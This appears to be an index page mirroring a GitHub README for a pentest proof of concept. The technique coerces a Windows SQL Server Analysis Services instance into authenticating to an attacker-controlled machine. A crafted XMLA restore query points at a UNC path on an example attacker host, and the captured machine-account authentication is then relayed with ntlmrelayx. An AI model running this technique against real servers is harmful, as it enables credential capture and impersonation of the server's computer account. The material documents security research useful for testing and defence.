Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/p0dalirius/mssql-analysis-coerce
A technique to coerce a Windows SQL Server to authenticate on an arbitrary machine.
analysis coerce mssql pentest windows
Last synced: about 1 month ago
- Host: GitHub
- URL: https://github.com/p0dalirius/mssql-analysis-coerce
- Owner: p0dalirius
- Created: 2022-08-31T10:08:05.000Z (about 2 years ago)
- Default Branch: main
- Last Pushed: 2023-10-01T21:14:20.000Z (about 1 year ago)
- Last Synced: 2024-10-12T07:03:36.132Z (about 1 month ago)
- Topics: analysis, coerce, mssql, pentest, windows
- Language: Python
- Homepage:
- Size: 2.49 MB
- Stars: 124
- Watchers: 3
- Forks: 14
- Open Issues: 0
Metadata Files:
- Readme: README.md
- Funding: .github/FUNDING.yml
README
# MSSQL Analysis Services - Coerced Authentication
![](./.github/banner.png)
A technique to coerce a Windows SQL Server to authenticate on an arbitrary machine.
This proof of concept is co-authored by:
- Podalirius:
- Worty:

## Proof of concept
In order to trigger the authentication as the local machine account, we need to connect to the remote SQL Server using user credentials:
![](./.github/sql_analysis_connect.png)
Then we will select "Restore" to restore the database from a given file.
![](./.github/restore_db.png)
To generate the XMLA file, put the path to a random file in the "Backup File" form, and click Ok.
![](./.github/accessed_xml_script.png)
Then replace that random file path with a UNC path pointing to your attacker server (for example `\\192.168.128\SYSVOL\db.abf`):
![](./.github/unc_path_in_xml_file.png)
Proof of concept XMLA query ([poc.xmla](./poc.xmla)):
```xml
\\192.168.2.51\SYSVOL\db.abf
\\192.168.2.51\SYSVOL\db.abf
\\192.168.2.51\SYSVOL\db.abf
```
And we get an authentication from the local machine account of the SQL Server:
![](./.github/responder_auth.png)
## Relaying for the win
Once we have obtained the authentication, we can relay it with `ntlmrelayx` to perform many actions on behalf of the computer account `SQL01$`.
This is cool, but it is complicated to trigger this coerced authentication from a Linux attacking machine as we do not have access to the SQL Server Management Studio (SSMS).
## References
- https://docs.microsoft.com/en-us/sql/database-engine/install-windows/install-sql-server?view=sql-server-ver15
- https://social.technet.microsoft.com/wiki/contents/articles/13106.sql-server-frequently-used-ports.aspx
- https://docs.microsoft.com/en-us/answers/questions/274512/connecting-to-azure-analysis-services-using-python.html